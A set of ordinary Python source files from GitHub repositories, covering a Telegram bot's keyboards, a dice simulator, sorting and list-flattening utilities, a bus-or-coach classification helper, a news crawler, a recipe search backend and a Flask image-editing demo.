KeyboardButton('Отмена \\U0001F554'),\n 'en': KeyboardButton('Cancel \\U0001F554'),\n 'kg': KeyboardButton('Жокко чыгаруу \\U0001F554'),\n }\n return ReplyKeyboardMarkup(resize_keyboard=True).add(cancel[lang])\n\ndef phone_number_buy_markup(lang='ru'):\n text = {\n 'ru': KeyboardButton('Номер', request_contact=True),\n 'en': KeyboardButton('Number', request_contact=True),\n 'kg': KeyboardButton('Номер', request_contact=True),\n }\n return ReplyKeyboardMarkup(resize_keyboard=True).add(text[lang])\n\ndef receive_notifications_yes_not_markup(lang='ru'):\n yes = {\n 'ru': InlineKeyboardButton('Да', callback_data='receive_notifications_1'),\n 'en': InlineKeyboardButton('Yes', callback_data='receive_notifications_1'),\n 'kg': InlineKeyboardButton('Ооба', callback_data='receive_notifications_1'),\n }\n\n no = {\n 'ru': InlineKeyboardButton('Нет', callback_data='receive_notifications_0'),\n 'en': InlineKeyboardButton('No', callback_data='receive_notifications_0'),\n 'kg': InlineKeyboardButton('Жок', callback_data='receive_notifications_0'),\n }\n\n return InlineKeyboardMarkup().add(yes[lang], no[lang])\n\ncontact_link_button = InlineKeyboardButton('Написать консультанту', url='https://www.t.me/toktokozhoev')\ncontact_markup = InlineKeyboardMarkup().add(contact_link_button)","repo_name":"sophiessa/ormatt_bot","sub_path":"keyboards/client_keyboards.py","file_name":"client_keyboards.py","file_ext":"py","file_size_in_byte":10027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"7341434825","text":"# Dice Simulator with API (random.org) and GUI\n\nimport random\nimport json\nimport requests\nimport PySimpleGUI as psg\nimport webbrowser\n\n# Version\nversion = 'beta'\n\n# Dictionary with dice images\ndice_art_dict = {\n 1: 'images/1.png',\n 2: 'images/2.png',\n 3: 'images/3.png',\n 4: 'images/4.png',\n 5: 'images/5.png',\n 6: 'images/6.png',\n 7: 'images/title.png',\n 8: 'images/close.png'\n}\n\n# Customization\ntheme = psg.theme('black')\nfont = 'Young'\n\n\ndef create_window():\n # Function with application layout\n\n layout = [\n [psg.VPush()],\n [psg.Push(), psg.Image(dice_art_dict[8], pad=0,\n enable_events=True,\n key=\"-CLOSE-\")],\n [psg.Text(\"GitHub\",\n font=f'{font} 10',\n text_color=\"light green\",\n enable_events=True,\n key=\"-LINK-\"),\n psg.Push(),\n psg.Text(f'Version: {version}', font=f'{font} 10')],\n [psg.VPush()],\n [psg.Image(dice_art_dict[7], key=\"-OUTPUT-\", size=(200, 200))],\n [psg.VPush()],\n [psg.Text(\"PRESS ROLL TO PLAY\", font=f'{font} 10')],\n [psg.VPush()],\n [psg.Button(\"ROLL\", key=\"-ROLL-\",\n border_width=0,\n size=(5, 2),\n button_color=('white', \"red\"),\n font=f'{font} 16')],\n [psg.VPush()],\n [psg.Text(\"ROLLED NUMBERS:\", font=f'{font} 10')],\n [psg.Text(\"\", key=\"-ROLLED-\", font=f'{font} 12')],\n [psg.VPush()],\n [psg.Text(\"AVERAGE:\", font=f'{font} 10')],\n [psg.Text(\"\", key=\"-AVG-\", font=f'{font} 12')],\n [psg.VPush()]\n ]\n\n return psg.Window(\"Dice Simulator\", layout,\n size=(300, 520),\n no_titlebar=True,\n element_justification=\"center\",\n grab_anywhere=True,\n finalize=True)\n\n\ndef roll_dice():\n # This function uses layout to create a window and contains all logic to roll the dice\n window = create_window()\n\n dice_list_str = []\n dice_list_int = []\n number_of_rolls = 0\n\n # Main loop\n while True:\n event, values = window.read()\n if event in (psg.WIN_CLOSED, \"-CLOSE-\"):\n break\n\n # GitHub link event\n if event in \"-LINK-\":\n webbrowser.open(\"https://github.com/paichiwo\")\n\n # Rolling dice\n if event == \"-ROLL-\":\n try:\n # Try rolling dice with API\n url = 'https://api.random.org/json-rpc/1/invoke'\n data = {'jsonrpc': '2.0',\n 'method': 'generateIntegers',\n 'params': {'apiKey': 'Your API key', # YOUR KEY\n 'n': 1, 'min': 1, 'max': 6,\n 'base': 10}, 'id': 1}\n\n params = json.dumps(data)\n response = requests.post(url, params)\n json_dict = response.json()\n final = json_dict['result']['random']['data']\n dice = final[0]\n\n # If API fails use random module to roll the dice\n except requests.ConnectionError:\n dice = random.randint(1, 6)\n except requests.HTTPError:\n dice = random.randint(1, 6)\n except KeyError:\n dice = random.randint(1, 6)\n\n # Count number of rolls\n number_of_rolls += 1\n\n # Display rolled dice result image\n output_msg = dice_art_dict[dice]\n\n # Append result to list of strings and list of integers\n dice_list_str.append(str(dice))\n dice_list_int.append(dice)\n\n # Scroll if there are more than 18 results (>18 results will be longer than app width)\n if len(dice_list_str) > 18:\n del(dice_list_str[0])\n\n # Count sum of list with integers\n sum_of_rolls = sum(dice_list_int)\n\n # Convert list to sequence of numbers\n rolled_numbers = \", \".join(dice_list_str)\n\n # Display results\n window[\"-OUTPUT-\"].update(output_msg, size=(200, 200))\n window[\"-ROLLED-\"].update(rolled_numbers)\n window[\"-AVG-\"].update(round(sum_of_rolls / number_of_rolls, 3))\n\n window.close()\n\n\nif __name__ == '__main__':\n roll_dice()\n","repo_name":"paichiwo/dice-simulator","sub_path":"Dice_Simulator.py","file_name":"Dice_Simulator.py","file_ext":"py","file_size_in_byte":4415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"6626976201","text":"'''\n目的:归并排序数组\n算法:利用递归的方法,如长度为1则直接返回,否则分为两组left和right,\n再将left和right分别归并排序。返回的结果是两组已排好的子列,将两子列\n从头遍历,比较头元素大小,进行合并。\n输入:待排序数组,如:[3, 7, 4, 8, 6, 1, 5, 2, 9]\n输出:已排序好数组,如:[1, 2, 3, 4, 5, 6, 7, 8, 9]\n时间复杂度:O(nlogn) 空间复杂度:O(1)\n算法稳定\n'''\n\ndef merge(left, right):\n res = []\n while len(left)>0 and len(right)>0:\n if left[0]<right[0]:\n res.append(left.pop(0))\n else:\n res.append(right.pop(0))\n if len(left)>0:\n res = res+left\n elif len(right)>0:\n res = res+right\n return res\n\n\ndef merge_sort(arr):\n if len(arr) <= 1:\n return arr\n middle_index = len(arr)//2\n left = merge_sort(arr[:middle_index])\n right = merge_sort(arr[middle_index:])\n return merge(left, right)\n\n\nif __name__ == '__main__':\n print(merge_sort([3, 7, 4, 8, 6, 1, 5, 2, 9]))","repo_name":"orangecsy/CodeRepo","sub_path":"Python/Sort/MergeSort.py","file_name":"MergeSort.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"30179341145","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 1 14:43:45 2018\n\n@author: edward.barratt\n\"\"\"\n\nfrom collections import Counter\nimport os\nimport argparse\nfrom selenium import webdriver\nimport pandas as pd\n#from fuzzywuzzy import process\nimported_fuzzy = False # Only import fuzzywuzzy if required.\n\ntry:\n import msvcrt # Good because users do not have to press enter\n # but unavaliable outside of windows.\n gotMSVCRT = True\nexcept ImportError:\n gotMSVCRT = False\n\n\ndef getInput(text=None):\n if gotMSVCRT:\n if text is not None:\n print(text)\n r = msvcrt.getch().decode('ascii').upper()\n return r\n else:\n if text is None:\n text=''\n r = input(text)\n return r\n\n\ndef sortBusesFromCoaches(numberPlateList, baseurl='https://www.flickr.com/search/?text={}&sort=date-posted-desc',\n data=None, vehRegPlateCol=None, metaCols={}):\n \"\"\"\n Iterate through a list of registration numbers. For each number open a browser\n showing the Flikr search results for that registration number and ask the\n user to specify what sort of vehicle it is.\n\n Returns a dictionary where each registration number has a value in either\n B (for bus), C (for coach), M (for minibus), O (for other), or U for (unknown).\n \"\"\"\n\n helpMessage = \"Use 'X' to exit programme.\"\n if (data is not None) and (len(metaCols) > 0):\n gotMeta = True\n helpMessage += \" Press 'U' (once) for meta data.\"\n else:\n gotMeta = False\n\n BCD = {'B': 'Bus', 'C': 'Coach', 'M': 'Minibus', 'O': 'Other', 'U': 'Unknown'}\n opts = list(BCD.keys())\n opts.append('X')\n busCoach = dict.fromkeys(numberPlateList, '-')\n driver = webdriver.Firefox()\n numberPlateC = Counter(numberPlateList)\n rnl = len(numberPlateC)\n for rni, (rn, N) in enumerate(numberPlateC.items()):\n if rni%10 == 0:\n print(helpMessage)\n url = baseurl.format(rn)\n BC = 'qqqq'\n while BC not in opts:\n print('{} of {} - {:>8} ({} occurrences): '.format(rni+1, rnl, rn, N), end='', flush=True)\n driver.get(url)\n print('Bus(B), Coach (C), Minibus(M), Other(O) or Unknown(U)? ', end='', flush=True)\n BC = getInput()\n BC = BC.upper()\n if BC not in opts:\n print('Input {} not understood.'.format(BC))\n if (BC == 'U') and (gotMeta):\n print('Unknown')\n print('Further Information:')\n for key, value in metaCols.items():\n print(' {}: {}'.format(key[3:-4], list(data.loc[data[vehRegPlateCol] == rn, value])[0]))\n print('Bus(B), Coach (C), Minibus(M), Other(O) or Unknown(U)? ', end='', flush=True)\n BC = getInput()\n BC = BC.upper()\n if BC in BCD.keys():\n print(BCD[BC])\n busCoach[rn] = BC\n else:\n print('Cancelled')\n break\n return busCoach\n\ndef testFromFile(inputfile=None, autoMiniBus=True,\n startNew=False, busCoachColOut='BusCoach', vehRegPlateCol='Plate',\n vehBodyCol='DVLA_VEHICLE_BODY', vehGrossWeightOCol='---',\n vehMakeOCol='---', vehModelOCol='---',\n vehUnladenWeightOCol='---', vehSeatingCapacityOCol='---',\n busBodyTypes = ['S/D BUS/COACH', 'D/D BUS/COACH', 'H/D BUS/COACH', 'MINIBUS'],\n trustPreviousDecisions=False, previousDecisionsFile=None,\n **kwargs):\n \"\"\"\n This is likely to only work on specific files.\n \"\"\"\n\n if len(kwargs):\n print('The following keyword arguments were provided and are not recognised:')\n for kwarg in kwargs.keys():\n print(kwarg)\n LocalArgs = locals()\n\n if inputfile[-4:] == '.csv':\n data = pd.read_csv(inputfile)\n else:\n data = pd.read_excel(inputfile)\n allColumns = list(data)\n metaCols = {}\n for Arg, Value in LocalArgs.items():\n if Arg[-4:] == 'OCol':\n # Check that the optional column exists.\n if Value not in allColumns:\n if not imported_fuzzy:\n from fuzzywuzzy import process\n imported_process = True\n bestOptions = process.extract(Value, allColumns, limit=5)\n posNames = \"', '\".join([x[0] for x in bestOptions])\n print((\"\\nOptional column {} does not exist in file, so will not be \"\n \"available for meta data options. You can specify another \"\n \"column using the --{} flag. Perhaps one of the \"\n \"following is appropriate: '{}'.\").format(Value, Arg, posNames))\n else:\n metaCols[Arg] = Value\n elif Arg[-3:] == 'Col':\n # Check that the required column exists.\n if Value not in allColumns:\n if not imported_fuzzy:\n from fuzzywuzzy import process\n imported_process = True\n bestOptions = process.extract(Value, allColumns, limit=5)\n posNames = '\", \"'.join([x[0] for x in bestOptions])\n raise ValueError(('Column {} does not exist in file, specify another '\n 'column using the --{} flag. Perhaps one of the '\n 'following is appropriate: \"{}\".').format(Value, Arg, posNames))\n\n print('{} records, {} unique registration plates.'.format(len(data.index), len(data[vehRegPlateCol].unique())))\n data_NB = data.loc[~data[vehBodyCol].isin(busBodyTypes)]\n if len(data_NB.index) > 0:\n print((\"{} records removed due to unrecognised body types. Set \"\n \"'--busBodyTypes' if any need to be accepted.\").format(len(data_NB.index)))\n print(data_NB[vehBodyCol].unique())\n print('Removed vehicle body types: {}.'.format(', '.join([str(x) for x in data_NB[vehBodyCol].unique()])))\n data = data.loc[data[vehBodyCol].isin(busBodyTypes)]\n print('{} records remaining, {} unique registration plates.'.format(len(data.index), len(data[vehRegPlateCol].unique())))\n\n data_orig = data.copy()\n\n BC_already = {}\n if trustPreviousDecisions:\n BC_already = getPreviousDecisions(previousDecisionsFile)\n regplates = BC_already.keys()\n regplatesnew = data[vehRegPlateCol].unique()\n BC_already = {r: BC_already[r] for r in regplates if r in regplatesnew}\n data_already = data.loc[data[vehRegPlateCol].isin(regplates)]\n data = data.loc[~data[vehRegPlateCol].isin(regplates)]\n print('{} already catagorised.'.format(len(data_already[vehRegPlateCol].unique())))\n\n if autoMiniBus:\n if vehGrossWeightOCol not in allColumns:\n print((\"The normally optional column {} is required when --autoMiniBus \"\n \"is set to True.\").format(vehGrossWeightOCol))\n\n data_minibus = data.loc[(data[vehBodyCol] == 'MINIBUS') &\n (data[vehGrossWeightOCol] <= 3501)]\n data = data.loc[(data[vehBodyCol] != 'MINIBUS') |\n (data[vehGrossWeightOCol] > 3501)]\n BC_minibus = dict.fromkeys(list(data_minibus[vehRegPlateCol]), 'M')\n print('{} automatically catagorised as minibuses.'.format(len(data_minibus.index)))\n else:\n BC_minibus = {}\n\n print('{} records remaining. {} unique registration numbers.'.format(len(data.index), len(set(data[vehRegPlateCol]))))\n if len(data.index) > 0:\n BC_rest = sortBusesFromCoaches(list(data[vehRegPlateCol]), data=data, vehRegPlateCol=vehRegPlateCol, metaCols=metaCols)\n else:\n BC_rest = {}\n\n print('Processing Complete.')\n yn = input('Update previously assigned values? [y/n]')\n if yn[0].upper() == 'Y':\n updatePreviousDecisions(previousDecisionsFile, {**BC_rest, **BC_already})\n\n BC = {**BC_already, **BC_minibus, **BC_rest}\n #for key, value in BC.items():\n # print(key, value)\n data_orig[busCoachColOut] = data_orig.apply(lambda row: BC[row[vehRegPlateCol]], axis=1)\n\n savepath, savefile = os.path.split(inputfile)\n savefile, _ = os.path.splitext(savefile)\n if savefile[-3:] != '_BC':\n savefile = os.path.join(savepath, savefile+'_BC')\n else:\n savefile = os.path.join(savepath, savefile)\n tn = 0\n while os.path.exists(savefile+'.csv'):\n tn += 1\n savefile = savefile+'{}'.format(tn)\n savefile = savefile+'.csv'\n print('Results saved in {}.'.format(savefile))\n data_orig.to_csv(savefile)\n\ndef getPreviousDecisions(file, includeCity=False):\n prevDataDF = pd.read_csv(file)\n prevData = {}\n if includeCity:\n for ri, row in prevDataDF.iterrows():\n prevData[row['Plate'].replace(' ', '')] = {'BC': row['BusCoach'], 'City': row['City'].split(', ')}\n else:\n for ri, row in prevDataDF.iterrows():\n prevData[row['Plate'].replace(' ', '')] = row['BusCoach']\n return prevData\n\ndef updatePreviousDecisions(file, BC_new):\n\n cityName = input('What city name would you like to assign to the new records?')\n prevData = getPreviousDecisions(file, includeCity=True)\n gotReg = prevData.keys()\n for reg, value in BC_new.items():\n if value not in ['B', 'C']:\n continue\n if reg in gotReg:\n prevData[reg]['BC'] = value\n prevData[reg]['City'].append(cityName)\n prevData[reg]['City'] = list(set(prevData[reg]['City']))\n else:\n prevData[reg] = {'BC': value, 'City': [cityName]}\n prevDataDF = pd.DataFrame(columns=['Plate', 'BusCoach', 'City'])\n for reg, value in prevData.items():\n prevDataDF = prevDataDF.append(pd.DataFrame([[reg, value['BC'], ', '.join(value['City'])]], columns=['Plate', 'BusCoach', 'City']))\n prevDataDF.to_csv(file, index=False)\n print('Previous decision file updated.')\n\nif __name__ == '__main__':\n\n desc = \"\"\"\n A tool that helps the user to decide whether a particular registration\n number belongs to a bus or a coach.\n \"\"\"\n parser = argparse.ArgumentParser(description=desc)\n parser.add_argument('inputfile', metavar='input file',\n type=str,\n help=(\"The file to process. This should be either an excel \"\n \"file or a csv file. At a minimum the file should \"\n \"contain a column or registration numbers. If the \"\n \"string 'TEST' is supplied then a small set of test \"\n \"registration numbers will be used to illustrate how \"\n \"the tool works.\"))\n\n parser.add_argument('--vehRegPlateCol', metavar='vehicle registration plate column name',\n type=str, nargs='?', default='PLATE',\n help=(\"The column name for the vehicle registration \"\n \"plate. Default 'PLATE'.\"))\n parser.add_argument('--busCoachColOut', metavar='bus or coach column name',\n type=str, nargs='?', default='BusCoach',\n help=(\"The name of the column that will be appended to \"\n \"the input file, holding the values determining \"\n \"bus form coach. Default 'BusCoach'.\"))\n parser.add_argument('--vehBodyCol', metavar='vehicle body type column name',\n type=str, nargs='?', default='Body',\n help=(\"The column name for the vehicle body type. \"\n \"Default 'Body'.\"))\n parser.add_argument('--vehGrossWeightOCol', metavar='vehicle gross weight column name',\n type=str, nargs='?', default='Gross Weight',\n help=(\"The column name for the vehicle gross weight. Optional. \"\n \"Default 'Gross Weight'.\"))\n parser.add_argument('--vehUnladenWeightOCol', metavar='vehicle unladen weight column name',\n type=str, nargs='?', default='Unladen Weight',\n help=(\"The column name for the vehicle unladen weight. Optional. \"\n \"Default 'Unladen Weight'.\"))\n parser.add_argument('--vehMakeOCol', metavar='vehicle make column name',\n type=str, nargs='?', default='Make',\n help=(\"The column name for the vehicle make. Optional. \"\n \"Default 'Make'.\"))\n parser.add_argument('--vehModelOCol', metavar='vehicle model column name',\n type=str, nargs='?', default='Model',\n help=(\"The column name for the vehicle make. Optional. \"\n \"Default 'Model'.\"))\n parser.add_argument('--vehSeatingCapacityOCol', metavar='vehicle seating capacity name',\n type=str, nargs='?', default='Seating Capacity',\n help=(\"The column name for the vehicle seating capacity. Optional. \"\n \"Default 'Seating Capacity'.\"))\n parser.add_argument('--autoMiniBus', metavar='detect minibuses automatically',\n type=bool, nargs='?', default=True,\n help=(\"If True, vehicles with a gross weight of 3500 kg \"\n \"or less will be automatically assigned as \"\n \"minibuses. If True, then an appropriate column \"\n \"must be specified for --vehGrossWeightOCol. Default \"\n \"True.\"))\n defaultbusBodyTypes = ['S/D BUS/COACH', 'D/D BUS/COACH', 'H/D BUS/COACH', 'MINIBUS']\n parser.add_argument('--busBodyTypes', metavar='bus or coach body classes',\n type=str, nargs='*', default=defaultbusBodyTypes,\n help=(\"Vehicle body classes that are considered to \"\n \"represent vehicles that are either buses or coaches. \"\n \"Default '{}'.\").format(\"', '\".join(defaultbusBodyTypes)))\n parser.add_argument('--trustPreviousDecisions', metavar='trust previous decisions',\n type=bool, nargs='?', default=True,\n help=(\"Will automatically assign the bus/coach value \"\n \"that was previously assigned by a previous \"\n \"operation. Default True.\"))\n parser.add_argument('--previousDecisionsFile', metavar='previous decisions file',\n type=str, nargs='?', default='gotAlready.csv',\n help=(\"File to use for the previous decisions. Default \"\n \"is the 'gotAlready.csv' file included.\"))\n\n # More parameters to be added as needed.\n pargs = parser.parse_args()\n pargs = vars(pargs)\n\n if pargs['inputfile'] == 'TEST':\n rns = ['SK07CAA', 'SK07CAE', 'SK07CAO', 'SK07CAU', 'SK07CAV', 'SK07CAX',\n 'SK07CBF', 'SK07CBU', 'SK07CBV', 'SK07CBX', 'SK07CBY', 'SK07CCA',\n 'SK07CAA', 'SK07CAE', 'SK07CAO', 'SK07CAU', 'SK07CAA', 'SK07CAE']\n print('Running with test dataset.')\n BCs = sortBusesFromCoaches(rns)\n print('Test dataset sorted as follows:')\n for key, value in BCs.items():\n print('{}: {}'.format(key, value))\n else:\n testFromFile(**pargs)","repo_name":"OceanMetSEPA/bus-or-coach","sub_path":"busOrCoach.py","file_name":"busOrCoach.py","file_ext":"py","file_size_in_byte":14524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"19726297117","text":"from selenium import webdriver\nimport os\nimport datetime\nfrom corpus import Corpus\n\nclass GoogleNewsURLCrawler:\n chromeDriver = None\n\n #인자1: 검색 키워드, 인자2: 한번의 검색 쿼리로 리턴할 결과들의 수\n def __init__(self, keyword = '', pageSizeToRetreive = 10):\n GoogleNewsURLCrawler.__InitializeChromeDriver()\n self.__initialize(keyword, pageSizeToRetreive)\n\n def __initialize(self, keyword, pageSizeToRetreive):\n self.pageCount = 0\n self.pageSizeToRetreive = pageSizeToRetreive\n self.keyword = keyword\n self.queryExpression = GoogleNewsURLCrawler._GetFormattedQueryExpressionForGoogleSearch(keyword)\n\n #내부 유틸(private)\n @classmethod\n def __InitializeChromeDriver(cls):\n if (cls.chromeDriver == None):\n cwd = os.getcwd()\n cls.chromeDriver = webdriver.Chrome(cwd + '/chromedriver')\n cls.chromeDriver.implicitly_wait(10)\n\n # 내부 유틸(private)\n @classmethod\n def _GetFormattedQueryExpressionForGoogleSearch(cls, keyword):\n queryExpression = ''\n\n splittedKeywords = keyword.split()\n if(1 <= len(splittedKeywords)):\n queryExpression += splittedKeywords[0]\n del splittedKeywords[0]\n\n for splittedKeyword in splittedKeywords:\n queryExpression += ('+' + splittedKeyword)\n\n return queryExpression\n\n # 내부 유틸(private)\n @classmethod\n def _getNextSearchURL(cls, queryExpression, pageCount, pageSizeToRetreive):\n return 'https://www.google.com/search?q={}&start={}&tbm=nws&num={}&hl=en'.format(queryExpression, pageCount, pageSizeToRetreive)\n\n @classmethod\n def _GetToday(cls):\n return \"{:%b %d, %Y}\".format(datetime.datetime.today())\n\n #다음 크롤링 결과를 얻어옴\n def next(self):\n urls = []\n\n searchURL = GoogleNewsURLCrawler._getNextSearchURL(self.queryExpression, self.pageCount, self.pageSizeToRetreive)\n self.pageCount += self.pageSizeToRetreive\n\n GoogleNewsURLCrawler.chromeDriver.get(searchURL)\n searchResults = GoogleNewsURLCrawler.chromeDriver.find_elements_by_class_name('_hJs')\n\n for searchResult in searchResults:\n try:\n link = searchResult.find_element_by_tag_name('h3').find_element_by_tag_name('a').get_attribute('href')\n date = searchResult.find_element_by_class_name('slp').find_element_by_class_name('_QHs').get_attribute('innerText')\n if date.find('ago') != -1:\n date = GoogleNewsURLCrawler._GetToday()\n\n urls.append((link, date))\n except Exception as errorMessage:\n print(errorMessage)\n continue\n\n corpora = []\n for url in urls:\n try:\n GoogleNewsURLCrawler.chromeDriver.get(url[0])\n terms = ''\n\n try:\n for element in GoogleNewsURLCrawler.chromeDriver.find_element_by_tag_name('body').find_elements_by_xpath(\".//*\"):\n if (element.tag_name != 'style') and (element.tag_name != 'script'):\n import re\n try:\n innerText = element.get_attribute('innerText')\n if innerText != None:\n tokens = list(filter(lambda element: (element != None) and (element != ''),\n re.split(r'\\s+|\\t+|\\n+|,|:|;|\\.', innerText)))\n for token in tokens:\n terms += (token + ' ')\n\n except Exception as ex:\n print('exception: ' + ex + 'exception text: ' + innerText)\n print('\\n')\n print('\\n')\n continue\n\n except Exception:\n continue\n\n corpora.append(Corpus(self.keyword, url[1], url[0], terms))\n except Exception:\n continue\n\n return corpora\n\n #크롤링 조건을 리셋하여 다시 검색\n #인자1: 검색 키워드, 인자2: 한번의 검색 쿼리로 리턴할 결과들의 수\n def reset(self, keyword, pageSizeToRetreive):\n self.__initialize(keyword, pageSizeToRetreive)\n\n\n#예제\n# def updateDataBase(keyword, page):\n# googleNewsURLCrawler = GoogleNewsURLCrawler(keyword, page)\n#\n# resultPage = googleNewsURLCrawler.next()\n# for result in resultPage:\n# result.save()\n#\n# updateDataBase('MSFT', 10)\n\n\n","repo_name":"cloudinertia/coin_predict","sub_path":"src/google_news_url_crawler.py","file_name":"google_news_url_crawler.py","file_ext":"py","file_size_in_byte":4687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"72871235192","text":"# 0. 导入需要的包和模块\nfrom PyQt5.Qt import *\nimport sys\n\n\n# class Label(QLabel):\n# def mousePressEvent(self, evt) -> None:\n# # QMouseEvent\n# if evt.button() == Qt.LeftButton:\n# self.setStyleSheet(\"background-color: red\")\n\nclass Window(QWidget):\n def mousePressEvent(self, evt) -> None:\n # QMouseEvent\n local_x = evt.localPos().x()\n local_y = evt.localPos().y()\n sub_widget = self.childAt(local_x, local_y)\n if sub_widget is not None:\n sub_widget.setStyleSheet(\"background-color: red\")\n\n\n# 1. 创建一个应用程序对象\napp = QApplication(sys.argv)\n\n# 2. 控件的操作\n# 2.1 创建控件\nwindow = Window()\n# 2.2 设置控件\nwindow.setWindowTitle(\"父子关系-案例\")\nwindow.resize(500, 500)\n\nfor i in range(10):\n label = QLabel(window)\n label.move(40 * i, 40 * i)\n label.setText(f\"标签{i}\")\n\n# 2.3 展示控件\nwindow.show()\n\n# 应用程序执行,进入消息循环\nsys.exit(app.exec_())\n","repo_name":"dongsen2019/pyqt5","sub_path":"04-QWidget-父子关系-案例ds.py","file_name":"04-QWidget-父子关系-案例ds.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"29401465904","text":"from timeit import timeit\n\nimport flatten # noqa\n\nSIZE = 1000\nTO_MS = 1000\nNUM = 10\nFUNCTIONS = [\n \"flatten_extend\",\n \"flatten_concatenation\",\n \"flatten_comprehension\",\n \"flatten_chain\",\n \"flatten_reduce_lambda\",\n \"flatten_reduce_add\",\n \"flatten_reduce_concat\",\n \"flatten_reduce_iconcat\",\n \"flatten_sum\",\n]\n\nmatrix = [list(range(SIZE))] * SIZE\n\nresults = {\n func: timeit(f\"flatten.{func}(matrix)\", globals=globals(), number=NUM)\n for func in FUNCTIONS\n}\n\nprint(f\"Time to flatten a {SIZE}x{SIZE} matrix (in milliseconds):\\n\")\n\nfor func, time in sorted(results.items(), key=lambda result: result[1]):\n print(f\"{func + '()':.<30}{time * TO_MS / NUM:.>7.2f} ms\")\n","repo_name":"realpython/materials","sub_path":"python-flatten-list/performance.py","file_name":"performance.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","stars":4481,"dataset":"github-code","pt":"95"} +{"seq_id":"16677975674","text":"from ..model.user import User, UserInf\nfrom ..model.Recipe import Recipe, Ingredient,IGD_category\nfrom flask import make_response, jsonify\nfrom .. import *\nfrom sqlalchemy import and_, or_\nimport json\nfrom ..util.token import TOKEN\nfrom collections import defaultdict\n\n\ndef process_search_igd(request):\n igd_info = json.loads(request.data)\n igd_name = \"%{}%\".format(igd_info['igd_name'])\n igd = Ingredient.query.filter(Ingredient.igd_name.like(igd_name)).all()\n\n return igd\n\n\ndef process_search_igd_list(request):\n igd_info = json.loads(request.data)\n igd_name_list = igd_info['igd_name'].split(',')\n\n igd_list = Ingredient.query.filter(Ingredient.igd_name.in_(igd_name_list)).all()\n return igd_list\n\ndef process_Search_recipe(request):\n igd_info = json.loads(request.data)\n igd_name_list = igd_info['igd_name'].split(',')\n R_category = igd_info['R_category']\n if R_category is None:\n R_category = ['breakfast','lunch','dinner','dessert','else']\n # print('R_category',R_category)\n # print('igd_name_list',igd_name_list)\n igd_list = Ingredient.query.filter(Ingredient.igd_name.in_(igd_name_list)).all()\n # print('igd_list_db',igd_list)\n R_id_dict= defaultdict(int)\n for igd in igd_list:\n # print(\"cur igd\",igd.igd_name)\n R_list = igd.Recipe\n # print(R_list)\n for R in R_list:\n # print(R.R_name)\n if R.R_category in R_category:\n R_id_dict[R]+=1\n response_sorted = sorted(R_id_dict.items() ,key = lambda x:x[1],reverse=True)\n # print(response_sorted)\n response_sorted = [x for x,y in response_sorted]\n\n # print(response_sorted)\n # R = Recipe.query.join(test.Recipe)\n # print(R)\n # R_list = Recipe.query.filter(and_(Recipe.R_category == R_category,Recipe.Ingredient.igd_name.in_(igd_name_list))).all()\n # return R_list\n\n return response_sorted\n\ndef process_search_category_igd(request):\n igd_info = json.loads(request.data)\n igb_category = igd_info['igd_category']\n\n if igb_category is None:\n return None\n\n igd_list = IGD_category.query.filter(IGD_category.igd_category_name==igb_category).first().Ingredient\n print(igd_list)\n\n\n return igd_list\n","repo_name":"Nicky-Lee/SpacemaneCooking","sub_path":"main/server/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":2219,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"42577502854","text":"from flask import Flask, render_template, request, redirect, url_for, abort\r\nimport json\r\n\r\napp = Flask(__name__)\r\n\r\nimport sys\r\nsys.path.append(\".\")\r\nsys.path.append(\"..\")\r\n\r\nimport argparse\r\nfrom PIL import Image, ImageOps\r\nimport numpy as np\r\nimport base64\r\nimport cv2\r\nfrom inference import demo\r\n\r\ndef Base64ToNdarry(img_base64):\r\n img_data = base64.b64decode(img_base64)\r\n img_np = np.fromstring(img_data, np.uint8)\r\n src = cv2.imdecode(img_np, cv2.IMREAD_ANYCOLOR)\r\n\r\n return src\r\n\r\ndef NdarrayToBase64(dst):\r\n result, dst_data = cv2.imencode('.png', dst)\r\n dst_base64 = base64.b64encode(dst_data)\r\n\r\n return dst_base64\r\n\r\nparser = argparse.ArgumentParser(description='User controllable latent transformer')\r\nparser.add_argument('--checkpoint_path', default='pretrained_models/latent_transformer/cat.pt')\r\nargs = parser.parse_args()\r\n\r\ndemo = demo(args.checkpoint_path)\r\n\r\n@app.route(\"/\", methods=[\"GET\", \"POST\"])\r\n#@auth.login_required\r\ndef init():\r\n if request.method == \"GET\":\r\n input_img = demo.run()\r\n input_base64 = \"data:image/png;base64,\"+NdarrayToBase64(input_img).decode()\r\n return render_template(\"index.html\", filepath1=input_base64, canvas_img=input_base64, result=True)\r\n if request.method == \"POST\":\r\n if 'zi' in request.form.keys():\r\n input_img = demo.move(z=-0.05)\r\n elif 'zo' in request.form.keys():\r\n input_img = demo.move(z=0.05)\r\n elif 'u' in request.form.keys():\r\n input_img = demo.move(y=-0.5, z=-0.0)\r\n elif 'd' in request.form.keys():\r\n input_img = demo.move(y=0.5, z=-0.0)\r\n elif 'l' in request.form.keys():\r\n input_img = demo.move(x=-0.5, z=-0.0)\r\n elif 'r' in request.form.keys():\r\n input_img = demo.move(x=0.5, z=-0.0)\r\n else:\r\n input_img = demo.run()\r\n \r\n input_base64 = \"data:image/png;base64,\"+NdarrayToBase64(input_img).decode()\r\n return render_template(\"index.html\", filepath1=input_base64, canvas_img=input_base64, result=True)\r\n\r\n@app.route('/zoom', methods=[\"POST\"])\r\ndef zoom_func():\r\n \r\n dz = json.loads(request.form['dz'])\r\n sx = json.loads(request.form['sx'])\r\n sy = json.loads(request.form['sy'])\r\n stop_points = json.loads(request.form['stop_points'])\r\n \r\n input_img = demo.zoom(dz,sxsy=[sx,sy],stop_points=stop_points)\r\n input_base64 = 